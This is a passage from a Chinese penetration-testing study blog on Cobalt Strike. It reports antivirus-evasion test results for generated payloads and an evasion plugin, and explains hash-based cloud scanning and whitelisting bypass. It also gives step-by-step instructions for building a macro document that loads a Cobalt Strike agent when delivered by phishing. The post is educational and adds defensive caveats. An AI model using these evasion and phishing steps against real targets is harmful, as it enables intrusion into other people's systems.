</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-4.png" alt=""></p> <p>使用 virustotal 查杀了一下生成的 bypass_go.exe，发现被 40 个引擎检测到，不得不说这效果很一般。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-5.png" alt=""></p> <p>实测可以过 360 安全卫士、360 杀毒，但腾讯电脑管家、火绒不行。</p> <blockquote><p>看到 VT 的检测结果后，我还以为四款杀软都能检测到呢，没想到啊。VT 给出的只是各引擎对上传文件的静态扫描结论，而本机安装的杀软还带有实时监控、行为检测和云查杀等组件，两边的结果并不能直接互推。</p></blockquote> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-11.png" alt=""></p> <h3 id="免杀插件">免杀插件 <a href="#免杀插件" class="header-anchor">#</a></h3> <p>后来又在 GitHub 上发现一款免杀插件（写作时为 2 个月前更新），项目地址：<a href="https://github.com/hack2fun/BypassAV" target="_blank" rel="noopener noreferrer">https://github.com/hack2fun/BypassAV<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>使用方法可以参考项目中的介绍，目前效果感觉还是可以的，在 virustotal 上只被 10 个引擎检测到。需要提醒的是，这类第三方 .cna 插件及其调用的编译、混淆工具都直接运行在操作者自己的 Cobalt Strike 客户端上，加载前最好先通读源码，确认它没有把生成的 payload 或监听器信息外传。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-7.png" alt=""></p> <p>实测可以过 360 安全卫士、360 杀毒、腾讯电脑管家，但火绒不行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-8.png" alt=""></p> <p>测试完成之后才体会到，为什么行动前要先判断目标用的是哪款杀软：就上面的结果来看，每款杀软都有漏检的样本，但漏检的样本各不相同，没有一种方式能同时过掉这四款。在实际的环境中，还是要根据目标的具体情况具体分析。</p> <blockquote><p>Emm，浏览器首页又被 360 改成 360 导航了。</p> <p>另外不得不说一句，从使用的角度来说，火绒是这里面最乖的，没有其他杀毒软件那么多花花肠子。</p></blockquote> <p><strong>补充</strong></p> <p>进行云查杀的一些情况：</p> <p>1、首先判断文件是否为正常文件</p> <p>2、如果判断为可疑文件，则把文件的 hash 上传到云上</p> 
<p>3、同时把这个文件标记为可疑文件，而不是正常文件</p> <p>因此，云查杀实际上是以文件 hash 为键去云端比对：只要样本在本地第一步没有被判为可疑，或者经过修改、重新生成后 hash 发生了变化（云端没有这个 hash 的记录），就不会被云查杀命中，表现上就像白名单里的程序一样。但这只绕过了基于 hash 的静态判定，对运行时的行为检测没有帮助。</p> <h3 id="java-applet">Java Applet <a href="#java-applet" class="header-anchor">#</a></h3> <p>接下来一起来看看 Cobalt Strike Java Applet 攻击。Cobalt Strike 在 Arsenal 中提供了 Applet Kit，即签名 Java Applet 攻击所用 Applet 的源码和构建脚本，可以自行修改、重新签名后再加载回 Cobalt Strike 使用。需要注意，Java Applet 依赖浏览器中的 Java 插件，现在的主流浏览器和新版 Java 已不再支持 Applet，这部分内容更多是历史参考。</p> <p>使用 Applet Kit 的步骤如下：</p> <p>1、到 <code>Help -&gt; Arsenal</code> 下载 Applet Kit</p> <p>2、如果需要的话就修改/混淆 Applet 源码</p> <p>3、使用代码签名证书进行签名</p> <p>4、构建</p> <p>5、在 Cobalt Strike 中加载 Applet Kit 附带的脚本</p> <p>大概从 2014 年 7 月起，钓鱼中又开始大量使用宏攻击（见下文第 4 节），在几年前，这是一种效果还很不错的攻击方式。</p> <h2 id="_3、应用白名单">3、应用白名单 <a href="#_3、应用白名单" class="header-anchor">#</a></h2> <p>站在防御者的角度，应用白名单的思路是只允许列出的可信程序运行，其余一律拒绝。对于攻击者，应对方式则是借助已在白名单内的合法程序（如 java、Office、PowerShell）把代理直接加载进内存执行，而不在磁盘上落地新的可执行文件，Java Applet 攻击就是这样做的。</p> <p>Java Applet、Office 宏、CS 下的 PowerShell 一句话上线都属于这种“直接注入内存”的执行方式，白名单产品若只校验磁盘上的可执行文件，就看不到它们。</p> <p>一些白名单免杀的资料：</p> <p><a href="https://twitter.com/subTee" target="_blank" rel="noopener noreferrer">https://twitter.com/subTee<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://github.com/khr0x40sh/WhiteListEvasion" target="_blank" rel="noopener noreferrer">https://github.com/khr0x40sh/WhiteListEvasion<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h3 id="白名单申请">白名单申请 <a href="#白名单申请" class="header-anchor">#</a></h3> <p>Win + R 打开运行窗口，输入 <code>gpedit.msc</code> ，来到 <code>用户配置 -&gt; 管理模板 -&gt; 系统</code> 处，打开 <code>只允许指定的 Windows 程序</code></p> <p>在打开的窗口中，勾选<code>已启用</code>，之后点击<code>显示</code>按钮，在其中写入白名单的程序名称后，点击两次确定之后即可。</p> <p>需要说明的是，这条策略只按进程的文件名匹配，并且只对通过资源管理器启动的程序生效，把程序改名或者从命令行、任务计划等途径启动即可绕过，它并不是真正意义上的应用程序控制，只适合用来做实验演示；生产环境应使用 AppLocker 或 WDAC 之类基于签名/哈希的机制。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-1.png" alt=""></p> <h2 id="_4、宏攻击">4、宏攻击 <a href="#_4、宏攻击" class="header-anchor">#</a></h2> <p>在 Cobalt Strike 客户端上，选择 <code>Packages --&gt; MS Office Macro</code>，指定一个监听器，点击 <code>Generate</code>，之后根据提示的步骤生成一个 Word 文档。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-2.png" alt=""></p> <p>大体的步骤如下：</p> <p>1、打开 Microsoft Word 或者 Excel</p> <p>2、来到 <code>视图 --&gt; 宏</code></p> <p>3、任意填写一个宏的名称</p> <p>4、宏的位置选择为当前文档</p> <p>5、点击创建</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-3.png" alt=""></p> <p>6、在打开的编辑器中，删除掉原来的内容</p> <p>7、点击 Cobalt Strike 上的 <code>Copy Macro</code> 按钮</p> <p>8、将刚复制 Cobalt Strike 生成的内容粘贴到打开的编辑器中</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-4.png" alt=""></p> <p>9、关闭编辑器</p> <p>10、将文档保存为启用宏的文档，这里可以选择保存为 <code>启用宏的 Word 文档</code> 或者 <code>Word 97-2003 文档</code></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-5.png" alt=""></p> <p>接下来使用钓鱼邮件等方式投递到靶机，目标打开文档并点击“启用内容”允许宏运行后即可上线。注意宏不会自动执行：能否运行取决于用户操作和 Office 的宏安全策略，对带有 Mark-of-the-Web（来自邮件、互联网下载）的文档，新版 Office 默认会直接阻止宏运行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-6.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-7.png" alt=""></p> <blockquote><p>这里不得不吐槽一句，Microsoft Office 的东西安装是真的麻烦。</p></blockquote> <p>在上面 2-8 步骤创建编辑宏内容的过程，也可以打开 <code>开发工具 --&gt; Visual Basic</code> 界面，这里推荐使用快捷键<code>Alt+F11</code>打开该界面。</p> <p>之后编辑<code>ThisDocument</code> 模块，粘贴宏代码也可以达到上述 2-8 步的效果。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs28-8.png" alt=""></p> <h1 id="_0x10-总结">0x10 总结 <a href="#_0x10-总结" class="header-anchor">#</a></h1> <p>感谢 Cobalt
Strike 的作者 <code>Raphael Mudge</code> 的课程，感谢 UP <code>Hack 学习呀</code> 上传的中文翻译版本，感谢 <code>A-Team</code> 团队的 Cobalt Strike 4.0 中文翻译手册，感谢每篇笔记最后参考链接的作者们，感谢曾经帮助我解决所碰到问题的大佬们，谢谢你们。</p> <h1 id="参考资料">参考资料 <a href="#参考资料" class="header-anchor">#</a></h1> <blockquote><p><a href="https://teamssix.com/year/201023-192553.html" target="_blank" rel="noopener noreferrer">https://teamssix.com/year/201023-192553.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://xz.aliyun.com/t/3975" target="_blank" rel="noopener noreferrer">https://xz.aliyun.com/t/3975<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://payloads.online/tools/socat" target="_blank" rel="noopener noreferrer">https://payloads.online/tools/socat<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 
d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://zhuanlan.zhihu.com/p/93718885" target="_blank" rel="noopener noreferrer">https://zhuanlan.zhihu.com/p/93718885<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.anquanke.com/post/id/156299" target="_blank" rel="noopener noreferrer">https://www.anquanke.com/post/id/156299<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.bilibili.com/video/BV16b411i7n5" target="_blank" rel="noopener noreferrer">https://www.bilibili.com/video/BV16b411i7n5<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 
d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/sectool/173366.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/sectool/173366.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://my.oschina.net/u/4300698/blog/3382230" target="_blank" rel="noopener noreferrer">https://my.oschina.net/u/4300698/blog/3382230<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://segmentfault.com/a/1190000019290085" target="_blank" rel="noopener noreferrer">https://segmentfault.com/a/1190000019290085<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path 
fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.cnblogs.com/cthon/p/9151467.html" target="_blank" rel="noopener noreferrer">https://www.cnblogs.com/cthon/p/9151467.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.secpulse.com/archives/127186.html" target="_blank" rel="noopener noreferrer">https://www.secpulse.com/archives/127186.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/articles/web/231892.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/articles/web/231892.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" 
height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://klionsec.github.io/2017/09/23/cobalt-strike/" target="_blank" rel="noopener noreferrer">https://klionsec.github.io/2017/09/23/cobalt-strike/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.renfei.org/blog/introduction-to-spf.html" target="_blank" rel="noopener noreferrer">https://www.renfei.org/blog/introduction-to-spf.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.cnblogs.com/backlion/p/10616308.html" target="_blank" rel="noopener noreferrer">https://www.cnblogs.com/backlion/p/10616308.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" 
focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/hnjztyx/article/details/52910478" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/hnjztyx/article/details/52910478<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="http://blog.leanote.com/post/snowming/62ec1132a2c9" target="_blank" rel="noopener noreferrer">http://blog.leanote.com/post/snowming/62ec1132a2c9<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/pipisorry/article/details/52269785" target="_blank" rel="noopener 
noreferrer">https://blog.csdn.net/pipisorry/article/details/52269785<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/l1028386804/article/details/86675559" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/l1028386804/article/details/86675559<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.freebuf.com/company-information/167460.html" target="_blank" rel="noopener noreferrer">https://www.freebuf.com/company-information/167460.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a 
href="https://blog.csdn.net/qq_34101364/article/details/108062913" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/qq_34101364/article/details/108062913<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/github_35186068/article/details/80518681" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/github_35186068/article/details/80518681<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://pythonpig.github.io/2018/01/17/Cobaltstrike-SMB-beacon/" target="_blank" rel="noopener noreferrer">https://pythonpig.github.io/2018/01/17/Cobaltstrike-SMB-beacon/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 
85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/" target="_blank" rel="noopener noreferrer">https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://lunamoore.github.io/2020/08/18/veil-evasion%E5%AE%89%E8%A3%85/" target="_blank" rel="noopener noreferrer">https://lunamoore.github.io/2020/08/18/veil-evasion%E5%AE%89%E8%A3%85/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/" target="_blank" rel="noopener noreferrer">https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 
